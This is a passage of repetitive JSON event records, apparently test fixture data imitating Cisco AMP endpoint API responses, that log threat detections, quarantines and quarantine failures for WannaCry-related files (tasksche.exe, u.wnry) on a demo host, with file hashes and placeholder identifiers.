pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":364000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":878000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":754000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":568000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":100000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 